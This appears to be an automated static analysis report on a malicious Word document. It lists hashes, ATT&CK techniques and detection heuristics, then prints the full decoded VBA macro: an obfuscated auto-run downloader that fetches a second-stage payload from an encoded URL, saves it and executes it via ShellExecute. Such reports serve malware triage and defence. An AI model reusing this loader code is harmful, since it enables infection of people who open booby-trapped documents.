Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5d2500d1e1776adf…

MALICIOUS

Office (OLE)

58.5 KB Created: 2015-01-19 09:36:00 Authoring application: Microsoft Office Word First seen: 2015-02-05
MD5: 0b91631d399a33bbe0417f1a4ed4c66b SHA-1: 1093ffca5842ae90bb8fd80ca1e14cff8513e18a SHA-256: 5d2500d1e1776adffe161bae934af1e52389d6134a3d14ce8d638fb6d6185fd2
306 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains an obfuscated VBA macro that uses `CreateObject` and `ShellExecute` to download and execute a second-stage payload. The `AutoOpen` and `Workbook_Open` subroutines trigger the execution of the obfuscated function `vyllq8a`, which is responsible for fetching and running the payload from a URL constructed via the `mqkX0Ayu` function. The specific URLs and object names are obfuscated, but the overall behavior indicates a downloader.

Heuristics 11

  • ClamAV: Doc.Dropper.Agent-6421993-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6421993-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        Set oNJBJkdsfsdf = CreateObject(mqkX0Ayu("xnuvx454F3ObhRKtaH48mm97Tj519WP2ANr45u4JYq3YzY448tkga4g2Zwpt950F2gB71SjK4sDGTrmn515CiD59I5EM1li92uy4wD54L3pk4k4j84LXio4f24LcNEq8DoN4A9Wz564Rs9wR56rQAGCpp4720h8aq5"))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set oNJBJkdsfsdf = CreateObject(mqkX0Ayu("xnuvx454F3ObhRKtaH48mm97Tj519WP2ANr45u4JYq3YzY448tkga4g2Zwpt950F2gB71SjK4sDGTrmn515CiD59I5EM1li92uy4wD54L3pk4k4j84LXio4f24LcNEq8DoN4A9Wz564Rs9wR56rQAGCpp4720h8aq5"))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        xlapp.ShellExecute Environ(mqkX0Ayu("uvZ46D7w2y55Fe2HkCdy0i6wb8k616ijc6u40jXmRC")) & mqkX0Ayu("LMXl35V8v819Qs891EL95020GA28x1B9501wJ9892r028Fzelo3B9o391950Cm1h989O2K0c28t1H794YH393946WT80f3O939aqwJ")
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7138 bytes
SHA-256: b2d163f4bb93f06a8fccd3fc90441edae69c78ab4dfe09e34e71799ae8742129
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub uiwefds()
pKIOHiosdf
End Sub
Sub AutoOpen()
    uiwefds
End Sub
Sub Workbook_Open()
    uiwefds
End Sub
Function vyllq8a(ByVal vWebFile As String, ByVal pNJKBjkdsf As String) As Boolean
    Dim lLJ As Long, GYUbjsdf As Long, drdTYIdsf() As Byte
GoTo F3EUlsL
F3EUlsL:
     







    Set oNJBJkdsfsdf = CreateObject(mqkX0Ayu("xnuvx454F3ObhRKtaH48mm97Tj519WP2ANr45u4JYq3YzY448tkga4g2Zwpt950F2gB71SjK4sDGTrmn515CiD59I5EM1li92uy4wD54L3pk4k4j84LXio4f24LcNEq8DoN4A9Wz564Rs9wR56rQAGCpp4720h8aq5"))
GoTo vIMF7E
vIMF7E:
    oNJBJkdsfsdf.Open mqkX0Ayu("M3rH5hFO041489RxDGr613T71zeo9Ka5964UYBYn"), vWebFile, False
GoTo RMAdNKcIJW
RMAdNKcIJW:
    oNJBJkdsfsdf.Send
Dim y0IiLysLq As String
     







     






    drdTYIdsf = oNJBJkdsfsdf.responseBody
GoTo vDvd1aJ
vDvd1aJ:
     







    GYUbjsdf = FreeFile
GoTo ryobDYUX
ryobDYUX:
    If Dir(pNJKBjkdsf) <> "" Then Kill pNJKBjkdsf
GoTo PeOZe
PeOZe:
    Open pNJKBjkdsf For Binary Access Write As #GYUbjsdf
GoTo bknS
bknS:
    Put #GYUbjsdf, , drdTYIdsf
GoTo B0AiUg
B0AiUg:
    Close #GYUbjsdf
Dim vIEdN As Currency

    Set oNJBJkdsfsdf = Nothing
Dim cIRt4Ae As Double
    Dim xlapp As Object
GoTo YGt
YGt:
    Set xlapp = CreateObject(mqkX0Ayu("SCmjZ3wFtp48p6S4j3bB68gQ424ku2lMIMd4kDw536yC45L3lOso6XE1um9cf3j2Dn4A0N7Wz447RVQ0r4PsH4C7BnMSrhg818uMt42G0A4pOw453TIJx6441mr0DTiCuKec41q58oTUH4UA07Y4Of4as8M72LE4U4g10JBV4Mrtuh662S4SKf6lh20Cgqxf"))
GoTo JOP4E
JOP4E:
    xlapp.ShellExecute Environ(mqkX0Ayu("uvZ46D7w2y55Fe2HkCdy0i6wb8k616ijc6u40jXmRC")) & mqkX0Ayu("LMXl35V8v819Qs891EL95020GA28x1B9501wJ9892r028Fzelo3B9o391950Cm1h989O2K0c28t1H794YH393946WT80f3O939aqwJ")
GoTo QfmDLcA
QfmDLcA:
    End Function
Sub pKIOHiosdf()
GoTo TWAl
TWAl:
HUIBuerwfds = mqkX0Ayu("JB8j4dV3n68L48r72u48B72Ep4u70LP42I4Sa3619kHb74h19w74vJ20M58da23W5s22HNT3941932rdKq2C31t02YO39k41s9qP32i22K68KZW2142gv19w32Jq2V05M8fnDz613yA422a2TC68243oLt62l352Nl2zj01m6N23O5p220Y16MI1dV9n74L44r94u46B62Ep4u36LP81I9Sa7445kHb78h49w14vJ44M10da19W3s24HNT7044368rdKq4C70t4Et17")
Dim MBAbp As Boolean
     






vyllq8a HUIBuerwfds, Environ(mqkX0Ayu("WXGS5FO04h4e1c4oRxDm0r6GT64a62tm4A8k0IYBIn")) & mqkX0Ayu("VBJX39P56zdaY2Z19pSn3M2Q1S5K0CQbyc2so2362iy1gH5b0219zxKep3j2236keinWJgJV817EUB43q2eN15fL0D2A1N9Wz3rR22VP3D61a9j78BLH43E4BXxv35cGF160ZrO4xG3RD43JYTE")

End Sub
Function mqkX0Ayu(InputStringToBeDecrypted As String) As String
Dim rJ54OUtqS As String
Dim sIrDHBnBj As Object
Dim Dg3E As String
Dim LeZ As Date
Dim wsgK8OOm As String
Dim jEORug As Object
Dim pDYhkPBNg As String
GoTo HyYIF
HyYIF:
Dim AIZv5X1Ct As String
GoTo DERmyA
DERmyA:
Dim CFvi As Integer
GoTo updG7ULj
updG7ULj:
Dim e6IwavHZ As Integer
Dim dcFTKZgvE As Double
On Error GoTo ErrorHandler
Dim UUZahwG As Currency
strTempText = InputStringToBeDecrypted
Dim oQl As Date
rJ54OUtqS = strTempText
Dim picFbmq As String
Dg3E = ""
Dim yukk As Long
rJ54OUtqS = Left(rJ54OUtqS, Len(rJ54OUtqS) - 4)
GoTo Wo2aZS
Wo2aZS:
rJ54OUtqS = Right(rJ54OUtqS, Len(rJ54OUtqS) - 4)
Dim gCwB As Long
nCharSize = 0
Dim vm0LeZbpak As Object
Call Extract_Char_Size(rJ54OUtqS, nCharSize)
Dim JP5IYI1CiQqn As Long
Call Extract_Enc_Key(rJ54OUtqS, nCharSize, nEncKey)
Dim EJY As Object
nTextLenght = Len(rJ54OUtqS)
GoTo lmAV
lmAV:
For nCounter = 1 To Len(rJ54OUtqS) Step nCharSize
GoTo dXMo
dXMo:
pDYhkPBNg = Mid(rJ54OUtqS, nCounter, nCharSize)
Dim sEWCoQ As Byte
nChar = oLsDFg(pDYhkPBNg)
Dim jXH As Boolean
nChar2 = nChar / nEncKey
GoTo YWv
YWv:
AIZv5X1Ct = Chr(nChar2)
Dim lqsqsIrDH As Boolean
Dg3E = Dg3E + AIZv5X1Ct
Dim Z4Of As Object
Next nCounter
Dim PSvi8w As Byte
Dim FgCwBe As Long
Dim mFbuT0a6N As Variant
Dg3E = Trim(Dg3E)
Dim gs2EgnGcKiQ As String
 mqkX0Ayu = Dg3E
Dim pdGqnG6Irod As Date
Exit Function
ErrorHandler:
GoTo tak6AhD
tak6AhD:
End Function


Sub Extract_Char_Size(ByRef rJ54OUtqS, ByRef nCharSize)
Dim gfVj As String
DecryptParts = DecryptParts & "/Extract_Char_Size/"
Dim FbmqkXH As Boolean
nLeft = Len(rJ54OUtqS) \ 2
GoTo BeQcvqsIrD
BeQcvqsIrD:
strLeft = Left(rJ54OUtqS, nLeft)
Dim rB6UIJ As Variant
GoTo AZXwv
AZXwv:
nRight = Len(rJ54OUtqS) - nLeft
Dim R8AtJP As Byte
strRight = Right(rJ54OUtqS, nRight)
Dim Tb8I As Boolean
GoTo KiQqnPN
KiQqnPN:
strKeyEnc = Right(strLeft, 2)
Dim h2IKZgvE As Double
strKeySize = Left(strRight, 2)
Dim afa As String
strKeyEnc = viuOJK(strKeyEnc)
GoTo X1aPSviu2a
X1aPSviu2a:
strKeySize = viuOJK(strKeySize)
GoTo S0OBjfi2AsIB
S0OBjfi2AsIB:
nKeyEnc = Val(strKeyEnc)
Dim yAdPbupdG As Boolean
nKeySize = Val(strKeySize)
GoTo cF3aJ5UvE
cF3aJ5UvE:
nCharSize = nKeySize - nKeyEnc
Dim H7Um As Date
rJ54OUtqS = Left(strLeft, Len(strLeft) - 2) + Right(strRight, Len(strRight) - 2)
Dim XHy8Iviu2a As Byte
End Sub

Function viuOJK(ByVal cString As String) As String
DecryptParts = DecryptParts & "/ viuOJK/"
GoTo QX0
QX0:
For nCounter = 1 To Len(cString)
GoTo N01UZbpak
N01UZbpak:
pDYhkPBNg = Mid(cString, nCounter, 1)
Dim eL6O6od As Date
If IsNumeric(pDYhkPBNg) Then
Dim frwrtW8IbAi As Double
GoTo e3Ifr8OwGl
e3Ifr8OwGl:
strTempString = strTempString + pDYhkPBNg
Dim fVja7U4Hm As Date
Else
strTempString = strTempString + "0"
Dim KnKU As Double
End If
Next nCounter
Dim PSvi8w As Byte
Dim FgCwBe As Long
Dim mFbuT0a6N As Variant
 viuOJK = strTempString
Dim TCoYNMC0OsN As Variant
End Function

Function oLsDFg(strTempText As String) As Integer
DecryptParts = DecryptParts & "/ oLsDFg/"
GoTo nG5AYDE3OP
nG5AYDE3OP:
strTempText = Trim(strTempText)
Dim YWoTHh0UeU As Object
For nCounter = 1 To Len(strTempText)
Dim tSAZX As Long
pDYhkPBNg = Mid(strTempText, nCounter, 1)
Dim yY1UK As Currency
If IsNumeric(pDYhkPBNg) Then
Dim frwrtW8IbAi As Double
GoTo e3Ifr8OwGl
e3Ifr8OwGl:
rJ54OUtqS = rJ54OUtqS + pDYhkPBNg
GoTo lgkcA
lgkcA:
End If
Next nCounter
Dim PSvi8w As Byte
Dim FgCwBe As Long
Dim mFbuT0a6N As Variant
nResult = Val(rJ54OUtqS)
GoTo fiNsI0bp
fiNsI0bp:
 oLsDFg = nResult
Dim Q6OfVjapic As Byte
End Function

Sub Extract_Enc_Key(ByRef rJ54OUtqS, ByVal nCharSize, ByRef nEncKey)
Dim DFgCwB5Oqsq As Boolean
DecryptParts = DecryptParts & "/Extract_Enc_Key/"
GoTo M8AX
M8AX:
strEncKey = vbNullString
GoTo tVUKXPeXCJ
tVUKXPeXCJ:
CFvi = Len(rJ54OUtqS) - nCharSize
GoTo p41Iji
p41Iji:
nLeft = CFvi \ 2
GoTo f5OFn2OJ3Oaaf
f5OFn2OJ3Oaaf:
strLeft = Left(rJ54OUtqS, nLeft)
Dim rB6UIJ As Variant
GoTo AZXwv
AZXwv:
nRight = CFvi - nLeft
Dim EiU As Date
strRight = Right(rJ54OUtqS, nRight)
Dim Tb8I As Boolean
GoTo KiQqnPN
KiQqnPN:
strEncKey = Mid(rJ54OUtqS, nLeft + 1, nCharSize)
GoTo EdNC
EdNC:
strEncKey = viuOJK(strEncKey)
Dim QCOUPRt As Byte
nEncKey = Val(Trim(strEncKey))
Dim Y2UcDCrGwNF As Object
rJ54OUtqS = strLeft + strRight
Dim KS0EHtVp As Boolean
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.